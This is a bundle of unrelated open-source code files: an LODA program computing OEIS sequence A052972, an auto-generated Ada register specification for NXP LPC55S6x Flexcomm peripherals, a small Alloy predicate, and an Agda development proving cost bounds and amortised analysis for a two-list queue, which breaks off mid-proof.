; A052972: Expansion of (1-x^3)/(1-x-x^2-x^3+x^5). ; Submitted by <NAME> ; 1,1,2,3,6,10,18,32,57,101,180,320,569,1012,1800,3201,5693,10125,18007,32025,56956,101295,180151,320395,569816,1013406,1802322,3205393,5700726,10138625,18031338,32068367,57032937,101431916,180394595 add $0,1 mov $5,1 lpb $0 sub $0,1 add $1,$5 add $1,1 sub $4,$5 mul $4,$2 mov $3,$4 mov $4,$2 mov $2,$1 div $3,$1 mov $1,$3 add $1,$5 max $1,1 sub $4,1 add $5,$4 lpe mov $0,$2 sub $0,1

arch/ARM/NXP/svd/lpc55s6x/nxp_svd-flexcomm.ads

morbos/Ada_Drivers_Library

2

13619

<filename>arch/ARM/NXP/svd/lpc55s6x/nxp_svd-flexcomm.ads -- Copyright 2016-2019 NXP -- All rights reserved.SPDX-License-Identifier: BSD-3-Clause -- This spec has been automatically generated from LPC55S6x.svd pragma Restrictions (No_Elaboration_Code); pragma Ada_2012; pragma Style_Checks (Off); with HAL; with System; package NXP_SVD.FLEXCOMM is pragma Preelaborate; --------------- -- Registers -- --------------- -- Peripheral Select. This field is writable by software. type PSELID_PERSEL_Field is ( -- No peripheral selected. No_Periph_Selected, -- USART function selected. Usart, -- SPI function selected. Spi, -- I2C function selected. I2C, -- I2S transmit function selected. I2S_Transmit, -- I2S receive function selected. I2S_Receive) with Size => 3; for PSELID_PERSEL_Field use (No_Periph_Selected => 0, Usart => 1, Spi => 2, I2C => 3, I2S_Transmit => 4, I2S_Receive => 5); -- Lock the peripheral select. This field is writable by software. type PSELID_LOCK_Field is ( -- Peripheral select can be changed by software. Unlocked, -- Peripheral select is locked and cannot be changed until this Flexcomm -- or the entire device is reset. Locked) with Size => 1; for PSELID_LOCK_Field use (Unlocked => 0, Locked => 1); -- USART present indicator. This field is Read-only. type PSELID_USARTPRESENT_Field is ( -- This Flexcomm does not include the USART function. Not_Present, -- This Flexcomm includes the USART function. Present) with Size => 1; for PSELID_USARTPRESENT_Field use (Not_Present => 0, Present => 1); -- SPI present indicator. This field is Read-only. type PSELID_SPIPRESENT_Field is ( -- This Flexcomm does not include the SPI function. Not_Present, -- This Flexcomm includes the SPI function. Present) with Size => 1; for PSELID_SPIPRESENT_Field use (Not_Present => 0, Present => 1); -- I2C present indicator. This field is Read-only. type PSELID_I2CPRESENT_Field is ( -- This Flexcomm does not include the I2C function. Not_Present, -- This Flexcomm includes the I2C function. Present) with Size => 1; for PSELID_I2CPRESENT_Field use (Not_Present => 0, Present => 1); -- I 2S present indicator. This field is Read-only. type PSELID_I2SPRESENT_Field is ( -- This Flexcomm does not include the I2S function. Not_Present, -- This Flexcomm includes the I2S function. Present) with Size => 1; for PSELID_I2SPRESENT_Field use (Not_Present => 0, Present => 1); subtype PSELID_ID_Field is HAL.UInt20; -- Peripheral Select and Flexcomm ID register. type PSELID_Register is record -- Peripheral Select. This field is writable by software. PERSEL : PSELID_PERSEL_Field := NXP_SVD.FLEXCOMM.No_Periph_Selected; -- Lock the peripheral select. This field is writable by software. LOCK : PSELID_LOCK_Field := NXP_SVD.FLEXCOMM.Unlocked; -- Read-only. USART present indicator. This field is Read-only. USARTPRESENT : PSELID_USARTPRESENT_Field := NXP_SVD.FLEXCOMM.Not_Present; -- Read-only. SPI present indicator. This field is Read-only. SPIPRESENT : PSELID_SPIPRESENT_Field := NXP_SVD.FLEXCOMM.Not_Present; -- Read-only. I2C present indicator. This field is Read-only. I2CPRESENT : PSELID_I2CPRESENT_Field := NXP_SVD.FLEXCOMM.Not_Present; -- Read-only. I 2S present indicator. This field is Read-only. I2SPRESENT : PSELID_I2SPRESENT_Field := NXP_SVD.FLEXCOMM.Not_Present; -- unspecified Reserved_8_11 : HAL.UInt4 := 16#0#; -- Read-only. Flexcomm ID. ID : PSELID_ID_Field := 16#101#; end record with Volatile_Full_Access, Size => 32, Bit_Order => System.Low_Order_First; for PSELID_Register use record PERSEL at 0 range 0 .. 2; LOCK at 0 range 3 .. 3; USARTPRESENT at 0 range 4 .. 4; SPIPRESENT at 0 range 5 .. 5; I2CPRESENT at 0 range 6 .. 6; I2SPRESENT at 0 range 7 .. 7; Reserved_8_11 at 0 range 8 .. 11; ID at 0 range 12 .. 31; end record; subtype PID_APERTURE_Field is HAL.UInt8; subtype PID_MINOR_REV_Field is HAL.UInt4; subtype PID_MAJOR_REV_Field is HAL.UInt4; subtype PID_ID_Field is HAL.UInt16; -- Peripheral identification register. type PID_Register is record -- Read-only. size aperture for the register port on the bus (APB or -- AHB). APERTURE : PID_APERTURE_Field; -- Read-only. Minor revision of module implementation. MINOR_REV : PID_MINOR_REV_Field; -- Read-only. Major revision of module implementation. MAJOR_REV : PID_MAJOR_REV_Field; -- Read-only. Module identifier for the selected function. ID : PID_ID_Field; end record with Volatile_Full_Access, Size => 32, Bit_Order => System.Low_Order_First; for PID_Register use record APERTURE at 0 range 0 .. 7; MINOR_REV at 0 range 8 .. 11; MAJOR_REV at 0 range 12 .. 15; ID at 0 range 16 .. 31; end record; ----------------- -- Peripherals -- ----------------- -- Flexcomm serial communication type FLEXCOMM_Peripheral is record -- Peripheral Select and Flexcomm ID register. PSELID : aliased PSELID_Register; -- Peripheral identification register. PID : aliased PID_Register; end record with Volatile; for FLEXCOMM_Peripheral use record PSELID at 16#FF8# range 0 .. 31; PID at 16#FFC# range 0 .. 31; end record; -- Flexcomm serial communication FLEXCOMM0_Periph : aliased FLEXCOMM_Peripheral with Import, Address => System'To_Address (16#40086000#); -- Flexcomm serial communication FLEXCOMM1_Periph : aliased FLEXCOMM_Peripheral with Import, Address => System'To_Address (16#40087000#); -- Flexcomm serial communication FLEXCOMM2_Periph : aliased FLEXCOMM_Peripheral with Import, Address => System'To_Address (16#40088000#); -- Flexcomm serial communication FLEXCOMM3_Periph : aliased FLEXCOMM_Peripheral with Import, Address => System'To_Address (16#40089000#); -- Flexcomm serial communication FLEXCOMM4_Periph : aliased FLEXCOMM_Peripheral with Import, Address => System'To_Address (16#4008A000#); -- Flexcomm serial communication FLEXCOMM5_Periph : aliased FLEXCOMM_Peripheral with Import, Address => System'To_Address (16#40096000#); -- Flexcomm serial communication FLEXCOMM6_Periph : aliased FLEXCOMM_Peripheral with Import, Address => System'To_Address (16#40097000#); -- Flexcomm serial communication FLEXCOMM7_Periph : aliased FLEXCOMM_Peripheral with Import, Address => System'To_Address (16#40098000#); -- Flexcomm serial communication FLEXCOMM8_Periph : aliased FLEXCOMM_Peripheral with Import, Address => System'To_Address (16#4009F000#); end NXP_SVD.FLEXCOMM;

alloy4fun_models/trashltl/models/9/39ghxD27cHXvfYiBm.als

Kaixi26/org.alloytools.alloy

0

2426

<gh_stars>0 open main pred id39ghxD27cHXvfYiBm_prop10 { always all f: Protected | always f not in Trash and always f not in File } pred __repair { id39ghxD27cHXvfYiBm_prop10 } check __repair { id39ghxD27cHXvfYiBm_prop10 <=> prop10o }

src/Examples/Queue.agda

jonsterling/agda-calf

29

11551

<filename>src/Examples/Queue.agda {-# OPTIONS --prop --rewriting #-} module Examples.Queue where open import Calf.CostMonoid open import Calf.CostMonoids using (ℕ-CostMonoid) costMonoid = ℕ-CostMonoid open CostMonoid costMonoid using (ℂ) open import Calf costMonoid open import Calf.Types.Nat open import Calf.Types.Unit open import Calf.Types.Sum open import Calf.Types.Bounded costMonoid open import Function open import Data.Nat open import Data.Nat.Properties import Data.Integer as Int import Data.Integer.Properties as IntP open import Data.List renaming (sum to lsum) open import Data.Product open import Relation.Binary.PropositionalEquality as P record Queue (A : tp pos) : Set where field Q : tp pos emp : val Q enq : cmp (Π Q λ _ → Π A λ _ → F Q) deq : cmp (Π Q λ _ → F (sum unit (Σ++ Q λ _ → A))) module CostList (A : tp pos) (n : ℕ) where -- Suppose we want to implement the Queue signature above using lists. -- One cost model is to count the number of times a cons node is inspected. -- This is implemented by the following annotated list type: -- destructing a cons node of type list n A consumes n steps. postulate list : tp pos nil : val list cons : val A → val list → val list list/ind : (l : val list) → (X : val list → tp neg) → cmp (X nil) → ((a : val A) → (l : val list) → (r : val (U (X l))) → cmp (X (cons a l))) → cmp (X l) list/ind/nil : ∀ {X} → (e0 : cmp (X nil)) → (e1 : (a : val A) → (l : val list) → (r : val (U (X l))) → cmp (X (cons a l))) → list/ind nil X e0 e1 ≡ e0 {-# REWRITE list/ind/nil #-} list/ind/cons : ∀ {X} → (a : val A) → (l : val list) → (e0 : cmp (X nil)) → (e1 : (a : val A) → (l : val list) → (r : val (U (X l))) → cmp (X (cons a l))) → list/ind (cons a l) X e0 e1 ≡ step (X (cons a l)) n (e1 a l (list/ind l X e0 e1)) {-# REWRITE list/ind/cons #-} list/match : (l : val list) → (X : val list → tp neg) → cmp (X nil) → ((a : val A) → (l : val list) → cmp (X (cons a l))) → cmp (X l) list/match l X e0 e1 = list/ind l X e0 (λ a l _ → e1 a l) bound/list/match : ∀ (l : val list) (X : val list → tp pos) {e0 : val (U (F (X nil)))} {e1 : (a : val A) → (l : val list) → val (U (F (X (cons a l))))} {p0 : val (U cost)} {p1 : (a : val A) → (l : val list) → val (U cost)} → IsBounded (X nil) e0 p0 → ((a : val A) → (l : val list) → IsBounded (X (cons a l)) (e1 a l) (p1 a l)) → IsBounded (X l) (list/match l (F ∘ X) e0 e1) (list/match l (λ _ → cost) p0 (λ a l → n + p1 a l)) bound/list/match l X {e0} {e1} {p0} {p1} ub0 ub1 = list/match l (λ l → meta (IsBounded (X l) (list/match l (F ∘ X) e0 e1) (list/match l (λ _ → cost) p0 (λ a l → n + p1 a l)))) ub0 λ a l → bound/circ n (bound/step n (p1 a l) (ub1 a l)) len : val list → ℕ len l = list/ind l (λ _ → meta ℕ) 0 λ a l r → 1 + r module Ex/CostList where open CostList nat 0 ex : val list ex = cons 0 (cons 1 nil) module Rev (A : tp pos) where open CostList A 1 revAppend : cmp (Π list λ _ → Π list λ _ → F list) revAppend l = list/ind l (λ _ → Π list λ _ → F list) (λ l' → ret l') λ x _ r → λ l' → r (cons x l') revAppend/lemma/cons : ∀ x xs l' → ◯ (∃ λ y → ∃ λ ys → (len ys ≡ len xs + len l') × revAppend (cons x xs) l' ≡ ret (cons y ys)) revAppend/lemma/cons x xs = list/ind xs (λ xs → meta (∀ x l' → ◯ (∃ λ y → ∃ λ ys → (len ys ≡ len xs + len l') × revAppend (cons x xs) l' ≡ ret (cons y ys)))) (λ x l' u → (x , l' , refl , step/ext (F list) (ret (cons x l')) 1 u)) (λ x' xs' ih x l' u → let (y , ys , h , ≡) = ih x' (cons x l') u in let open ≡-Reasoning in y , ys , ( begin len ys ≡⟨ h ⟩ len xs' + len (cons x l') ≡⟨⟩ len xs' + step (meta ℕ) 1 (suc (len l')) ≡⟨ cong (len xs' +_) (step/ext (meta ℕ) (suc (len l')) 1 u) ⟩ len xs' + suc (len l') ≡⟨ +-suc (len xs') (len l') ⟩ suc (len xs' + len l') ≡⟨⟩ suc (len xs') + len l' ≡˘⟨ cong (_+ len l') (step/ext (meta ℕ) (suc (len xs')) 1 u) ⟩ step (meta ℕ) 1 (suc (len xs')) + len l' ≡⟨⟩ len (cons x' xs') + len l' ∎ ) , ( begin revAppend (cons x (cons x' xs')) l' ≡⟨⟩ step (F list) 1 (revAppend (cons x' xs') (cons x l')) ≡⟨ step/ext (F list) _ 1 u ⟩ revAppend (cons x' xs') (cons x l') ≡⟨ (≡) ⟩ ret (cons y ys) ∎ )) x revAppend/cost : cmp (Π list λ _ → Π list λ _ → cost) revAppend/cost l l' = len l revAppend≤revAppend/cost : ∀ l l' → IsBounded list (revAppend l l') (revAppend/cost l l') revAppend≤revAppend/cost l = list/ind l (λ l → meta (∀ l' → IsBounded list (revAppend l l') (revAppend/cost l l'))) (λ l' → bound/ret) (λ a l r → λ l' → bound/circ 1 (bound/step 1 (len l) (r (cons a l')))) rev : cmp (Π list λ _ → F list) rev l = revAppend l nil rev/lemma/cons : ∀ x xs → ◯ (∃ λ y → ∃ λ ys → len ys ≡ len xs × rev (cons x xs) ≡ ret (cons y ys)) rev/lemma/cons x xs = subst (λ n → ◯ (∃ λ y → ∃ λ ys → len ys ≡ n × rev (cons x xs) ≡ ret (cons y ys))) (+-identityʳ _) (revAppend/lemma/cons x xs nil) rev/cost : cmp (Π list λ _ → cost) rev/cost l = len l rev≤rev/cost : ∀ l → IsBounded list (rev l) (rev/cost l) rev≤rev/cost l = revAppend≤revAppend/cost l nil -- Implement Queue with a pair of lists; (f , b) represents the queue f :: rev b. module FrontBack (A : tp pos) where -- For simplicity, we charge 1 step for each cons node destruction. open CostList A 1 open Rev A Q : tp pos Q = Σ++ list λ _ → list emp : val Q emp = (nil , nil) enq : cmp (Π Q λ _ → Π A λ _ → F Q) enq (f , b) x = ret (f , cons x b) enq/cost : cmp (Π Q λ _ → Π A λ _ → cost) enq/cost (f , b) x = 0 enq≤enq/cost : ∀ q x → IsBounded Q (enq q x) (enq/cost q x) enq≤enq/cost q x = bound/ret deq-tp = sum unit (Σ++ Q λ _ → A) deq/emp : cmp (Π list λ _ → F deq-tp) deq/emp l = list/match l (λ _ → F deq-tp) (ret (inj₁ triv)) λ a l' → ret (inj₂ ((l' , nil) , a)) deq/emp/cost : cmp (Π list λ _ → cost) deq/emp/cost l = list/match l (λ _ → cost) 0 λ a l' → 1 + 0 deq/emp≤deq/emp/cost : ∀ l → IsBounded deq-tp (deq/emp l) (deq/emp/cost l) deq/emp≤deq/emp/cost l = bound/list/match l (λ _ → deq-tp) bound/ret λ a l' → bound/ret deq : cmp (Π Q λ _ → F deq-tp) deq (f , b) = list/match f (λ _ → F deq-tp) (bind (F deq-tp) (rev b) (λ b' → deq/emp b')) λ a l → ret (inj₂ ((l , b) , a)) deq/cost : cmp (Π Q λ _ → cost) deq/cost (f , b) = list/match f (λ _ → cost) (bind cost (rev b) (λ b' → rev/cost b + deq/emp/cost b')) λ a l → 1 + 0 deq/cost/closed : cmp (Π Q λ _ → cost) deq/cost/closed (f , b) = list/match f (λ _ → cost) (list/match b (λ _ → cost) 0 (λ _ b' → 1 + len b)) λ _ _ → 1 deq/cost≤deq/cost/closed : ∀ q → ◯ (deq/cost q ≤ deq/cost/closed q) deq/cost≤deq/cost/closed (f , b) u = list/match f (λ f → meta (deq/cost (f , b) ≤ deq/cost/closed (f , b))) (list/match b (λ b → meta (deq/cost (nil , b) ≤ deq/cost/closed (nil , b))) ≤-refl λ x xs → let open ≤-Reasoning in let (y , ys , _ , ≡) = rev/lemma/cons x xs u in begin deq/cost (nil , cons x xs) ≡⟨⟩ bind cost (rev (cons x xs)) (λ b' → rev/cost (cons x xs) + deq/emp/cost b') ≡⟨⟩ bind cost (rev (cons x xs)) (λ b' → rev/cost (cons x xs) + deq/emp/cost b') ≡⟨ cong (λ e → bind cost e (λ b' → rev/cost (cons x xs) + deq/emp/cost b')) (≡) ⟩ rev/cost (cons x xs) + deq/emp/cost (cons y ys) ≡⟨⟩ step cost 1 (suc (len xs)) + step cost 1 1 ≡⟨ cong₂ _+_ (step/ext cost (suc (len xs)) 1 u) (step/ext cost 1 1 u) ⟩ suc (len xs) + 1 ≡⟨ +-comm (suc (len xs)) 1 ⟩ suc (suc (len xs)) ≡˘⟨ cong suc (step/ext cost _ 1 u) ⟩ suc (step cost 1 (suc (len xs))) ≡⟨⟩ suc (len (cons x xs)) ≡˘⟨ step/ext cost _ 1 u ⟩ step cost 1 (suc (len (cons x xs))) ≡⟨⟩ list/match (cons x xs) (λ _ → cost) 0 (λ _ b' → 1 + len (cons x xs)) ≡⟨⟩ deq/cost/closed (nil , cons x xs) ∎ ) λ _ _ → ≤-refl deq≤deq/cost : ∀ q → IsBounded deq-tp (deq q) (deq/cost q) deq≤deq/cost (f , b) = bound/list/match f (λ _ → deq-tp) (bound/bind (rev/cost b) _ (rev≤rev/cost b) λ b' → deq/emp≤deq/emp/cost b') λ a l → bound/ret deq≤deq/cost/closed : ∀ q → IsBounded deq-tp (deq q) (deq/cost/closed q) deq≤deq/cost/closed q = bound/relax (deq/cost≤deq/cost/closed q) (deq≤deq/cost q) -- Amortized analysis for front-back queue. -- The goal is to bound the cost of a single-thread sequence of queue operations staring with an initial queue q0, -- where an operation is either an enqueue or a dequeue. data op : Set where op/enq : (x : val A) → op op/deq : op -- Potential function ϕ : val Q → ℕ ϕ (f , b) = len f + 2 * len b -- o operate q is the computation induced by operation o on queue q. -- Needed because deq doesn't always return a queue (e.g., deq emp). -- In these cases we just return the empty queue. _operate_ : op → val Q → cmp (F Q) (op/enq x) operate q = enq q x (op/deq) operate q = bind (F Q) (deq q) λ s → (sum/case unit (Σ++ Q λ _ → A) (λ _ → F Q) s (λ _ → ret (nil , nil)) (λ (q , x) → ret q)) -- o operateϕ q is morally ϕ (o operate q), which doesn't type-check since o operate q is a computation. -- Easier to work with than bind cost (o operate q) ϕ (but they are equivalent, as shown below). _operateϕ_ : op → val Q → ℂ (op/enq x) operateϕ (f , b) = len f + 2 * (1 + len b) (op/deq) operateϕ (f , b) = list/match f (λ _ → cost) (list/match b (λ _ → cost) 0 (λ _ b' → len b')) (λ _ f' → len f' + 2 * len b) operateϕ≡ϕ∘operate : ∀ o q → ◯ (o operateϕ q ≡ bind cost (o operate q) ϕ) operateϕ≡ϕ∘operate (op/enq x) (f , b) u = begin len f + 2 * (1 + len b) ≡˘⟨ cong (λ n → len f + 2 * n) (step/ext cost (1 + len b) 1 u) ⟩ len f + 2 * step cost 1 (1 + len b) ≡⟨⟩ bind cost (enq (f , b) x) ϕ ∎ where open ≡-Reasoning operateϕ≡ϕ∘operate op/deq (f , b) u = list/match f (λ f → meta ((op/deq operateϕ (f , b)) ≡ bind cost (op/deq operate (f , b)) ϕ)) (list/ind b (λ b → meta ((op/deq operateϕ (nil , b)) ≡ bind cost (op/deq operate (nil , b)) ϕ)) refl λ a l ih → emp/cons a l) λ a l → refl where emp/cons : ∀ a l → op/deq operateϕ (nil , cons a l) ≡ bind cost (op/deq operate (nil , cons a l)) ϕ emp/cons a l with rev/lemma/cons a l u ... | (x' , l' , eqn1 , eqn2) = begin op/deq operateϕ (nil , cons a l) ≡⟨⟩ step cost 1 (len l) ≡⟨ step/ext cost (len l) 1 u ⟩ len l ≡⟨ P.sym eqn1 ⟩ len l' ≡⟨ P.sym (+-identityʳ (len l')) ⟩ len l' + 0 ≡⟨⟩ len l' + 2 * len nil ≡⟨⟩ ϕ (l' , nil) ≡˘⟨ step/ext cost (ϕ (l' , nil)) 1 u ⟩ step cost 1 (ϕ (l' , nil)) ≡⟨⟩ bind cost (step (F Q) 1 (ret (l' , nil))) ϕ ≡⟨⟩ bind cost (bind (F Q) (step (F deq-tp) 1 (ret (inj₂ ((l' , nil) , x')))) λ s → (sum/case unit (Σ++ Q λ _ → A) (λ _ → F Q) s (λ _ → ret (nil , nil)) (λ (q , x) → ret q))) ϕ ≡⟨⟩ bind cost (bind (F Q) (deq/emp (cons x' l')) λ s → (sum/case unit (Σ++ Q λ _ → A) (λ _ → F Q) s (λ _ → ret (nil , nil)) (λ (q , x) → ret q))) ϕ ≡˘⟨ cong (λ e → bind cost (bind (F Q) e λ l' → bind (F Q) (deq/emp l') λ s → (sum/case unit (Σ++ Q λ _ → A) (λ _ → F Q) s (λ _ → ret (nil , nil)) (λ (q , x) → ret q))) ϕ ) eqn2 ⟩ bind cost (bind (F Q) (rev (cons a l)) λ l' → bind (F Q) (deq/emp l') λ s → (sum/case unit (Σ++ Q λ _ → A) (λ _ → F Q) s (λ _ → ret (nil , nil)) (λ (q , x) → ret q))) ϕ ≡⟨⟩ bind cost (bind (F Q) (deq (nil , cons a l)) λ s → (sum/case unit (Σ++ Q λ _ → A) (λ _ → F Q) s (λ _ → ret (nil , nil)) (λ (q , x) → ret q))) ϕ ≡⟨⟩ bind cost (op/deq operate (nil , cons a l)) ϕ ∎ where open ≡-Reasoning -- op/cost o q is the cost of o operate q. op/cost : op → val Q → ℕ op/cost (op/enq x) q = 0 op/cost (op/deq) (f , b) = list/match f (λ _ → cost) (list/match b (λ _ → cost) 0 (λ _ b' → 2 + len b')) (λ _ _ → 1) deq/cost≡cost/deq : ∀ q → ◯ (deq/cost/closed q ≡ op/cost op/deq q) deq/cost≡cost/deq (f , b) u = P.cong (λ x → list/match f (λ _ → cost) x (λ _ _ → 1)) ( list/match b (λ b → meta (list/match b (λ _ → cost) 0 (λ _ b' → 1 + len b) ≡ list/match b (λ _ → cost) 0 (λ _ b' → 2 + len b'))) refl (λ a l → let open ≡-Reasoning in begin list/match (cons a l) (λ _ → cost) 0 (λ _ b' → 1 + len (cons a l)) ≡⟨⟩ step cost 1 (1 + len (cons a l)) ≡⟨ step/ext cost (1 + len (cons a l)) 1 u ⟩ 1 + len (cons a l) ≡⟨⟩ 1 + step cost 1 (suc (len l)) ≡⟨ cong (1 +_) (step/ext cost (suc (len l)) 1 u) ⟩ 2 + len l ≡˘⟨ step/ext cost (2 + len l) 1 u ⟩ step cost 1 (2 + len l) ≡⟨⟩ list/match (cons a l) (λ _ → cost) 0 (λ _ b' → 2 + len b') ∎ ) ) -- cost o q upperbounds the cost of o operate q. op≤op/cost : ∀ o q → IsBounded Q (o operate q) (op/cost o q) op≤op/cost (op/enq x) q = enq≤enq/cost q x op≤op/cost op/deq q rewrite P.sym (+-identityʳ (op/cost (op/deq) q)) = bound/bind/const {A = deq-tp} {e = deq q} {f = λ s → (sum/case unit (Σ++ Q λ _ → A) (λ _ → F Q) s (λ _ → ret (nil , nil)) (λ (q , x) → ret q))} (op/cost op/deq q) 0 (bound/relax (λ u → ≤-reflexive (deq/cost≡cost/deq q u)) (deq≤deq/cost/closed q)) λ a → bound/sum/case/const/const unit ((Σ++ Q λ _ → A)) (λ _ → Q) a ((λ _ → ret (nil , nil))) (λ (q , x) → ret q) 0 (λ _ → bound/ret) (λ _ → bound/ret) -- is/acost o k when for any state q, k suffices for the cost of o on q and the difference in the potential. is/acost : op → ℕ → Set is/acost o k = ∀ q → (Int.+ (op/cost o q)) Int.+ ((o operateϕ q) Int.⊖ (ϕ q)) Int.≤ Int.+ k acost/weaken : ∀ {m n o} → m ≤ n → is/acost o m → is/acost o n acost/weaken h1 h2 = λ q → IntP.≤-trans (h2 q) (Int.+≤+ h1) -- A sequence of operations induces a single computation by threading through the initial state q0. _op/seq_ : List op → val Q → cmp (F Q) [] op/seq q0 = ret q0 (o ∷ os) op/seq q = bind (F Q) (o operate q) λ q' → os op/seq q' op/seq/cost : ∀ (l : List op) → val Q → ℂ op/seq/cost [] q0 = 0 op/seq/cost (o ∷ os) q = bind cost (o operate q) λ q' → op/cost o q + op/seq/cost os q' -- Cost of a sequence computation is bounded by the sum of cost of the constituents. op/seq≤op/seq/cost : ∀ l q → IsBounded Q (l op/seq q) (op/seq/cost l q) op/seq≤op/seq/cost [] q0 = bound/ret op/seq≤op/seq/cost (o ∷ os) q = bound/bind {A = Q} {e = o operate q} {f = λ q → os op/seq q} (op/cost o q) (op/seq/cost os) (op≤op/cost o q) λ q → op/seq≤op/seq/cost os q -- Telescoping the potential. op/seq/cost/tele : ∀ (l : List op) → val Q → Int.ℤ op/seq/cost/tele [] q0 = Int.0ℤ op/seq/cost/tele (o ∷ os) q = bind (meta Int.ℤ) (o operate q) λ q' → (Int.+ (op/cost o q)) Int.+ (o operateϕ q Int.⊖ ϕ q) Int.+ (op/seq/cost/tele os q') ϕn : ℕ → List op → val Q → ℕ ϕn zero l q0 = ϕ q0 ϕn (suc n) (o ∷ os) q = bind cost (o operate q) λ q' → ϕn n os q' ϕn (suc n) [] q = 0 -- Potential of the initial state ϕ/0 : List op → val Q → ℕ ϕ/0 l = ϕn 0 l -- Potential of the final state ϕ/-1 : List op → val Q → ℕ ϕ/-1 l = ϕn (length l) l bind/dup : ∀ A 𝕊 𝕋 e f (g : val A → 𝕊 → 𝕋) → bind {A} (meta 𝕋) e (λ a → g a (bind {A} (meta 𝕊) e f)) ≡ bind {A} (meta 𝕋) e (λ a → g a (f a)) bind/dup A 𝕊 𝕋 e f g = begin bind (meta 𝕋) e (λ a → g a (bind (meta 𝕊) e f)) ≡⟨ P.cong (λ h → bind (meta 𝕋) e h) (funext (λ a → bind/meta A 𝕊 𝕋 e f (λ s → g a s))) ⟩ bind (meta 𝕋) e (λ a → bind (meta 𝕋) e (λ a' → g a (f a'))) ≡⟨ bind/idem A 𝕋 e (λ a a' → g a (f a')) ⟩ bind (meta 𝕋) e (λ a → g a (f a)) ≡⟨ refl ⟩ bind (meta 𝕋) e (λ a → g a (f a)) ∎ where open ≡-Reasoning -- Telescoping sum: -- Σᵢⁿ op/cost oᵢ + ϕ qᵢ - ϕ qᵢ₋₁ = ϕ q_{n-1} - ϕ q_0 + Σᵢ costᵢ cost≡cost/tele : ∀ l q → ◯ (op/seq/cost/tele l q ≡ (ϕ/-1 l q Int.⊖ ϕ/0 l q) Int.+ (Int.+ (op/seq/cost l q))) cost≡cost/tele [] q u = P.sym ( begin (ϕ q Int.⊖ ϕ q) Int.+ (Int.+ 0) ≡⟨ IntP.+-identityʳ (ϕ q Int.⊖ ϕ q) ⟩ ϕ q Int.⊖ ϕ q ≡⟨ IntP.n⊖n≡0 (ϕ q) ⟩ Int.+ 0 ≡⟨ refl ⟩ Int.+ 0 ∎ ) where open ≡-Reasoning cost≡cost/tele (o ∷ os) q u rewrite operateϕ≡ϕ∘operate o q u | bind/meta Q ℕ Int.ℤ (o operate q) (λ q' → op/cost o q + op/seq/cost os q') (λ x → (ϕ/-1 (o ∷ os) q Int.⊖ ϕ/0 (o ∷ os) q) Int.+ (Int.+ x)) | bind/dup Q ℕ Int.ℤ (o operate q) (ϕ/-1 os) (λ q' x → (x Int.⊖ ϕ q) Int.+ (Int.+ (op/cost o q + op/seq/cost os q'))) | bind/dup Q ℕ Int.ℤ (o operate q) ϕ (λ q' x → Int.+ (op/cost o q) Int.+ (x Int.⊖ ϕ q) Int.+ (op/seq/cost/tele os q')) = P.cong (λ f → bind (meta Int.ℤ) (o operate q) f) (funext (λ q' → ( begin (Int.+ (op/cost o q)) Int.+ (ϕ q' Int.⊖ ϕ q) Int.+ (op/seq/cost/tele os q') ≡⟨ P.cong (λ x → (Int.+ (op/cost o q)) Int.+ (ϕ q' Int.⊖ ϕ q) Int.+ x) (cost≡cost/tele os q' u) ⟩ Int.+ op/cost o q Int.+ (ϕ q' Int.⊖ ϕ q) Int.+ (ϕ/-1 os q' Int.⊖ ϕ/0 os q' Int.+ Int.+ op/seq/cost os q') ≡⟨ P.cong (λ x → x Int.+ (ϕ/-1 os q' Int.⊖ ϕ/0 os q' Int.+ Int.+ op/seq/cost os q')) (IntP.+-comm (Int.+ op/cost o q) (ϕ q' Int.⊖ ϕ q)) ⟩ ϕ q' Int.⊖ ϕ q Int.+ Int.+ op/cost o q Int.+ (ϕ/-1 os q' Int.⊖ ϕ/0 os q' Int.+ Int.+ op/seq/cost os q') ≡⟨ IntP.+-assoc (ϕ q' Int.⊖ ϕ q) (Int.+ op/cost o q) (ϕ/-1 os q' Int.⊖ ϕ/0 os q' Int.+ Int.+ op/seq/cost os q') ⟩ ϕ q' Int.⊖ ϕ q Int.+ (Int.+ op/cost o q Int.+ (ϕ/-1 os q' Int.⊖ ϕ/0 os q' Int.+ Int.+ op/seq/cost os q')) ≡⟨ P.cong (λ x → ϕ q' Int.⊖ ϕ q Int.+ x) (P.sym (IntP.+-assoc (Int.+ op/cost o q) (ϕ/-1 os q' Int.⊖ ϕ/0 os q') (Int.+ op/seq/cost os q'))) ⟩ ϕ q' Int.⊖ ϕ q Int.+ (Int.+ op/cost o q Int.+ (ϕ/-1 os q' Int.⊖ ϕ/0 os q') Int.+ Int.+ op/seq/cost os q') ≡⟨ P.cong (λ x → ϕ q' Int.⊖ ϕ q Int.+ (x Int.+ Int.+ op/seq/cost os q')) (IntP.+-comm (Int.+ op/cost o q) (ϕ/-1 os q' Int.⊖ ϕ/0 os q')) ⟩ ϕ q' Int.⊖ ϕ q Int.+ (ϕ/-1 os q' Int.⊖ ϕ/0 os q' Int.+ Int.+ op/cost o q Int.+ Int.+ op/seq/cost os q') ≡⟨ P.cong (λ x → ϕ q' Int.⊖ ϕ q Int.+ x) (IntP.+-assoc (ϕ/-1 os q' Int.⊖ ϕ/0 os q') (Int.+ op/cost o q) (Int.+ op/seq/cost os q')) ⟩ ϕ q' Int.⊖ ϕ q Int.+ (ϕ/-1 os q' Int.⊖ ϕ/0 os q' Int.+ (Int.+ op/cost o q Int.+ Int.+ op/seq/cost os q')) ≡⟨ P.sym (IntP.+-assoc (ϕ q' Int.⊖ ϕ q) (ϕ/-1 os q' Int.⊖ ϕ/0 os q') (Int.+ op/cost o q Int.+ Int.+ op/seq/cost os q')) ⟩ ϕ q' Int.⊖ ϕ q Int.+ (ϕ/-1 os q' Int.⊖ ϕ/0 os q') Int.+ (Int.+ op/cost o q Int.+ Int.+ op/seq/cost os q') ≡⟨ P.cong (λ x → x Int.+ (ϕ/-1 os q' Int.⊖ ϕ/0 os q') Int.+ (Int.+ op/cost o q Int.+ Int.+ op/seq/cost os q')) (P.sym (IntP.m-n≡m⊖n (ϕ q') (ϕ q))) ⟩ Int.+ ϕ q' Int.- (Int.+ ϕ q) Int.+ (ϕ/-1 os q' Int.⊖ ϕ/0 os q') Int.+ (Int.+ op/cost o q Int.+ Int.+ op/seq/cost os q') ≡⟨ P.cong (λ x → Int.+ ϕ q' Int.- (Int.+ ϕ q) Int.+ x Int.+ (Int.+ op/cost o q Int.+ Int.+ op/seq/cost os q')) (P.sym (IntP.m-n≡m⊖n (ϕ/-1 os q') (ϕ/0 os q'))) ⟩ Int.+ ϕ q' Int.- Int.+ ϕ q Int.+ (Int.+ ϕ/-1 os q' Int.- (Int.+ ϕ/0 os q')) Int.+ 